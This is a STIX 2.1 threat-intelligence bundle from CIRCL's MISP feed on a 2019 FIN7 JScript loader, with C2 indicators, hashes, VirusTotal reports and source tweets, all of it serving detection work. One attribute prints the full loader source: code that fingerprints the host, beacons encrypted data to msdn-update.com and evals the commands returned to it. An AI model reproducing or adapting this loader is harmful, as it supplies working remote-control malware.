misp-circl-feed/feeds/circl/stix-2.1/5cda6599-990c-4803-8c89-45e4950d210f.json

401 lines
No EOL
24 KiB
JSON

{
"type": "bundle",
"id": "bundle--5cda6599-990c-4803-8c89-45e4950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:13.000Z",
"modified": "2019-07-19T09:22:13.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5cda6599-990c-4803-8c89-45e4950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:13.000Z",
"modified": "2019-07-19T09:22:13.000Z",
"name": "OSINT - [Emering] FIN7 JScript Loader Malware",
"published": "2019-07-19T09:22:23Z",
"object_refs": [
"indicator--5cda6ff0-4758-4fe6-a14d-4f4f950d210f",
"x-misp-attribute--5cda7440-6ef4-459c-b3d1-b951950d210f",
"indicator--5cda8135-1174-4cd2-ae6b-456d950d210f",
"x-misp-object--5cda6884-2c74-4a8c-886d-47e3950d210f",
"indicator--5cda6f37-4d7c-4ad4-9000-6ec3950d210f",
"indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"x-misp-object--72369506-7485-494e-b492-2a31c412cf70",
"x-misp-object--5cdaaf7c-422c-4524-856c-464b950d210f",
"x-misp-object--7fc62f80-7bf1-48af-96f6-2c3c99a4536c",
"relationship--39b1b60d-5b5b-4e6e-8934-116b94d81656",
"relationship--475f306c-31bd-4ac1-a933-1d53a1499130"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7\"",
"misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7 - G0046\"",
"misp-galaxy:mitre-intrusion-set=\"FIN7\"",
"misp-galaxy:mitre-intrusion-set=\"FIN7 - G0046\"",
"misp-galaxy:threat-actor=\"Anunak\"",
"circl:incident-classification=\"malware\"",
"osint:source-type=\"microblog-post\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cda6ff0-4758-4fe6-a14d-4f4f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:36:16.000Z",
"modified": "2019-05-14T07:36:16.000Z",
"description": "C2",
"pattern": "[domain-name:value = 'msdn-update.com']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-14T07:36:16Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"domain\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cda7440-6ef4-459c-b3d1-b951950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:54:40.000Z",
"modified": "2019-05-14T07:54:40.000Z",
"labels": [
"misp:type=\"other\"",
"misp:category=\"Other\""
],
"x_misp_category": "Other",
"x_misp_comment": "2019-05-13-FIN7-JS-loader.vk.js",
"x_misp_type": "other",
"x_misp_value": "// Bank Statement James Fifeman.xls\r\n// C2: hxxps://msdn-update[.]com/\r\n// SHA-256: 1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1\r\n\r\nfunction anonymous() {\r\n var zbegbiwhuhro = \"&id=\";\r\n var ihebgysipc = \"fetch\";\r\n var yfusrihyny = \"\";\r\n var tindajrurke = \"get_image\";\r\n var ytysqyprozlibx = \"string\";\r\n var otocywviso = \"no\";\r\n var otbybimollu = \"Unknown\";\r\n var evaritpequx = \"Scripting.FileSystemObject\";\r\n var yqpawymfikorh = \"_\";\r\n var koficijojhi = \"/\";\r\n var inoxhegzajw = \"action=get_command\";\r\n var ihunuxfip = \"request\";\r\n var edomsecejso = \"z\";\r\n var lwilpotasvo = \"create_logo\";\r\n var vimkiwono = \"string\";\r\n var pidwagunit = \"%APPDATA%\";\r\n var gqyxqohoftupi = \"winmgmts:root/CIMV2\";\r\n var erzirolonje = \"create_image\";\r\n var esajigfown = \"decrypt\";\r\n var ewypetevhu = \"?request=page\";\r\n var bgixmabefzaqnu = \"show_ico\";\r\n var huzzakrowopvu = \"\";\r\n var zexygrogy = \"\";\r\n var iwpodhexzubc = \"images\";\r\n var bbymyruztovpi = \"WScript.Shell\";\r\n var xaprislyhbulf = \"show_jpg\";\r\n var inbypzethezag = \"&\";\r\n var ucmomadgib = \"request\";\r\n var vjiwumhojarse = \"group=zsoc._1305&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=\";\r\n var cedlihrijalti = \"?request=content&id=\";\r\n var kyppaltuwti = \"image\";\r\n var ejogamygpu = \"MSXML2.ServerXMLHTTP\";\r\n var cylofalpitx = \"content\";\r\n var fifuwacdez = \"encrypt\";\r\n var atkudecaxme = \"decrypt\";\r\n var obawufdoxsa = \"\";\r\n var bhomnismictu = \"encrypt\";\r\n var ocsekeltan = \"show_png\";\r\n var vivijsozvali = \"User-Agent\";\r\n var yracypcamos = \"no\";\r\n var kexerobi = \"cdn\";\r\n var inamvagtixjyxj = \"POST\";\r\n var usubhejreva = \"_\";\r\n var jaxylibpafl = \"\";\r\n var hbanamyklujt = \"\";\r\n var bvaxoqwetmodg = \"agyjabam=\";\r\n var ditevnaqa = \"https://msdn-update.com/\";\r\n var wegmexxabha = \"POST\";\r\n var dnanehmufride = \"encrypt\";\r\n var fypalygos = \"application/x-www-form-urlencoded\";\r\n var urmuqizemz = \"Content-Type\";\r\n\r\n function id() {\r\n var lrequest = wmi.ExecQuery(\"select * from Win32_NetworkAdapterConfiguration where ipenabled = true\");\r\n var lItems = new Enumerator(lrequest);\r\n for (; !lItems.atEnd(); lItems.moveNext()) {\r\n var mac = lItems.item().macaddress;\r\n var dns_hostname = lItems.item().DNSHostName;\r\n if (typeof mac === vimkiwono && mac.length > 1) {\r\n if (typeof dns_hostname !== vimkiwono && dns_hostname.length < 1) {\r\n dns_hostname = otbybimollu;\r\n } else {\r\n for (var i = 0; i < dns_hostname.length; i++) {\r\n if (dns_hostname.charAt(i) > edomsecejso) {\r\n dns_hostname = dns_hostname.substr(0, i) + yqpawymfikorh + dns_hostname.substr(i + 1);\r\n }\r\n }\r\n }\r\n return mac + yqpawymfikorh + dns_hostname;\r\n }\r\n }\r\n }\r\n\r\n function crypt_controller(type, request) {\r\n var encryption_key = obawufdoxsa;\r\n if (type === esajigfown) {\r\n request = unescape(request);\r\n var request_split = request.split(\")*(\");\r\n request = request_split[0];\r\n encryption_key = request_split[1].split(obawufdoxsa);\r\n } else {\r\n encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(obawufdoxsa);\r\n request = unescape(encodeURIComponent(request));\r\n }\r\n var output = new Array(request.length);\r\n for (var i = 0; i < request.length; i++) {\r\n var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);\r\n output[i] = String.fromCharCode(charCode);\r\n }\r\n var result_string = output.join(obawufdoxsa);\r\n if (type === fifuwacdez) {\r\n result_string = result_string + \")*(\" + encryption_key.join(obawufdoxsa);\r\n result_string = escape(result_string);\r\n }\r\n return result_string;\r\n }\r\n\r\n function get_path() {\r\n var pathes = [iwpodhexzubc, kyppaltuwti, cylofalpitx, ihebgysipc, kexerobi];\r\n var files = [lwilpotasvo, tindajrurke, erzirolonje, bgixmabefzaqnu, ocsekeltan, xaprislyhbulf];\r\n var path = pathes[Math.floor(Math.random() * pathes.length)] + koficijojhi + files[Math.floor(Math.random() * files.length)];\r\n return ditevnaqa + path;\r\n }\r\n\r\n function send_data(type, data, crypt) {\r\n try {\r\n var http_object = new ActiveXObject(ejogamygpu);\r\n if (type === ucmomadgib) {\r\n http_object.open(inamvagtixjyxj, get_path() + ewypetevhu, false);\r\n data = bvaxoqwetmodg + crypt_controller(fifuwacdez, vjiwumhojarse + uniq_id + zbegbiwhuhro + id() + inbypzethezag + data);\r\n } else {\r\n http_object.open(inamvagtixjyxj, get_path() + cedlihrijalti + uniq_id, false);\r\n if (crypt) {\r\n data = crypt_controller(fifuwacdez, data);\r\n }\r\n }\r\n http_object.setRequestHeader(vivijsozvali, \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0\");\r\n http_object.setRequestHeader(urmuqizemz, fypalygos);\r\n http_object.setOption(2, 13056);\r\n http_object.send(data);\r\n return http_object.responseText;\r\n } catch (e) {\r\n return otocywviso;\r\n }\r\n }\r\n\r\n function main() {\r\n var ncommand = obawufdoxsa;\r\n ncommand = send_data(ucmomadgib, inoxhegzajw, true);\r\n if (ncommand !== otocywviso) {\r\n try {\r\n eval(crypt_controller(esajigfown, ncommand));\r\n } catch (e) {}\r\n }\r\n var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);\r\n WScript.Sleep(random_knock);\r\n main();\r\n }\r\n var first = false;\r\n var shell = new ActiveXObject(bbymyruztovpi);\r\n var fso = new ActiveXObject(evaritpequx);\r\n var wmi = GetObject(gqyxqohoftupi);\r\n var uniq_id = new Date().getUTCMilliseconds();\r\n var app_path = shell.expandEnvironmentStrings(pidwagunit);\r\n if (fso.GetFolder(app_path).Type.length > 5) {\r\n fso.deleteFile(WScript.ScriptFullName);\r\n try {\r\n WScript.Sleep(120000);\r\n main();\r\n } catch (e) {\r\n main();\r\n }\r\n }\r\n}"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cda8135-1174-4cd2-ae6b-456d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T08:49:57.000Z",
"modified": "2019-05-14T08:49:57.000Z",
"description": "C2",
"pattern": "[url:value = 'https://msdn-update.com/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-14T08:49:57Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cda6884-2c74-4a8c-886d-47e3950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:04:36.000Z",
"modified": "2019-05-14T07:04:36.000Z",
"labels": [
"misp:name=\"microblog\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "post",
"value": "2019-05-13: [Emering] #FIN7 JScript Loader #Malware\r\n\u00f0\u0178\u0090\u00b2\r\n\r\nsource: 'Bank Statement James Fifeman.xls'\r\ngroup: 'zsoc._1305' [May 13]\r\n\u00f0\u0178\u203a\u2018\r\nc2: 'msdn-update[.]com'\r\n\u00f0\u0178\u201d\u00a6\r\nMove away from '-cdn' domains \r\n\u00f0\u0178\u00a4\u201d\r\n\r\nh/t @malz_intel\r\n\r\n\u00f0\u0178\u203a\u00a1\u00ef\u00b8\u008f\r\nPushed to their extracted JS loader GitHub -> \r\n(link: https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js) github.com/k-vitali/Malwa\u00e2\u20ac\u00a6",
"category": "Other",
"uuid": "5cda6884-fafc-4ff5-86eb-46cc950d210f"
},
{
"type": "text",
"object_relation": "type",
"value": "Twitter",
"category": "Other",
"uuid": "5cda6884-df40-4d23-bd55-4264950d210f"
},
{
"type": "url",
"object_relation": "url",
"value": "https://twitter.com/VK_Intel/status/1128079463785349121",
"category": "Network activity",
"to_ids": true,
"uuid": "5cda6884-8acc-4b2f-8684-49c8950d210f"
},
{
"type": "text",
"object_relation": "username-quoted",
"value": "@malz_intel",
"category": "Other",
"uuid": "5cda6884-c40c-4d40-b736-4967950d210f"
},
{
"type": "url",
"object_relation": "link",
"value": "https://t.co/BaCFsrePJR?amp=1",
"category": "Network activity",
"to_ids": true,
"uuid": "5cda6884-cefc-440d-97f9-4714950d210f"
},
{
"type": "url",
"object_relation": "link",
"value": "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5cda6884-4d8c-4584-85d0-4a50950d210f"
},
{
"type": "datetime",
"object_relation": "creation-date",
"value": "2019-05-14T01:27:00",
"category": "Other",
"uuid": "5cda6885-34b0-4285-be67-4cb6950d210f"
},
{
"type": "text",
"object_relation": "username",
"value": "VK_Intel",
"category": "Other",
"uuid": "5cda6885-5680-4687-a649-4a84950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "microblog"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cda6f37-4d7c-4ad4-9000-6ec3950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T07:40:54.000Z",
"modified": "2019-05-14T07:40:54.000Z",
"pattern": "[file:hashes.SHA256 = '1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1' AND file:name = 'Bank Statement James Fifeman.xls' AND file:x_misp_state = 'Malicious']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-14T07:40:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:00.000Z",
"modified": "2019-07-19T09:22:00.000Z",
"pattern": "[file:hashes.MD5 = 'b136fed01acf1b7e7e43dfa2db292623' AND file:hashes.SHA1 = 'd8206bc4bc2efc4062b0f173e8841508c95ed0e4' AND file:hashes.SHA256 = '1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-07-19T09:22:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--72369506-7485-494e-b492-2a31c412cf70",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T08:34:49.000Z",
"modified": "2019-05-14T08:34:49.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-14T04:00:38",
"category": "Other",
"uuid": "4ff03189-7f70-4120-9dbf-48339e5c57d0"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1557806438/",
"category": "Payload delivery",
"uuid": "521c12c0-2269-4961-8bad-1482e01ee72b"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "11/60",
"category": "Payload delivery",
"uuid": "c267d1a4-d836-4758-91e2-877f5854faf6"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cdaaf7c-422c-4524-856c-464b950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-05-14T12:07:24.000Z",
"modified": "2019-05-14T12:07:24.000Z",
"labels": [
"misp:name=\"microblog\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "post",
"value": "@VK_Intel\r\n Moar #FIN7 (link: https://www.virustotal.com/#/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/detection) virustotal.com/#/file/1fe27e0\u00e2\u20ac\u00a6\r\nCscript renamed to mswmex57.exe and run from Contacts directory. JavaScript from UserForm1 placed in querlog.txt just like old times. New C2 though: hxxps://msdn-update[.]com/",
"category": "Other",
"uuid": "5cdaaf7d-cca4-49d5-bf6c-4e64950d210f"
},
{
"type": "text",
"object_relation": "type",
"value": "Twitter",
"category": "Other",
"uuid": "5cdaaf7d-89bc-4f82-9c5f-4295950d210f"
},
{
"type": "url",
"object_relation": "url",
"value": "https://twitter.com/malz_intel/status/1128058016471719936",
"category": "Network activity",
"to_ids": true,
"uuid": "5cdaaf7d-5bc8-4555-bfdf-4dc4950d210f"
},
{
"type": "text",
"object_relation": "username-quoted",
"value": "@VK_Intel",
"category": "Other",
"uuid": "5cdaaf7d-d750-4d9d-a9a6-4b4b950d210f"
},
{
"type": "datetime",
"object_relation": "creation-date",
"value": "2019-05-14T00:02:00",
"category": "Other",
"uuid": "5cdaaf7d-9734-4341-ae0f-4d72950d210f"
},
{
"type": "text",
"object_relation": "username",
"value": "malz_intel",
"category": "Other",
"uuid": "5cdaaf7d-bb48-4f3f-80bb-48a2950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "microblog"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--7fc62f80-7bf1-48af-96f6-2c3c99a4536c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2019-07-19T09:22:01.000Z",
"modified": "2019-07-19T09:22:01.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-06-12T04:39:43",
"category": "Other",
"uuid": "c1bf4318-12d5-451a-a094-3ecf4f476b2a"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1560314383/",
"category": "Payload delivery",
"uuid": "4b41b608-5721-4f9a-8950-7775eefaebce"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "30/59",
"category": "Payload delivery",
"uuid": "de92bfbb-35cc-4731-8327-4be37aa1cbee"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--39b1b60d-5b5b-4e6e-8934-116b94d81656",
"created": "2019-05-14T08:34:49.000Z",
"modified": "2019-05-14T08:34:49.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"target_ref": "x-misp-object--72369506-7485-494e-b492-2a31c412cf70"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--475f306c-31bd-4ac1-a933-1d53a1499130",
"created": "2019-07-19T09:22:01.000Z",
"modified": "2019-07-19T09:22:01.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--8d2ae1f9-3b21-43e4-aceb-121f903988bc",
"target_ref": "x-misp-object--7fc62f80-7bf1-48af-96f6-2c3c99a4536c"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}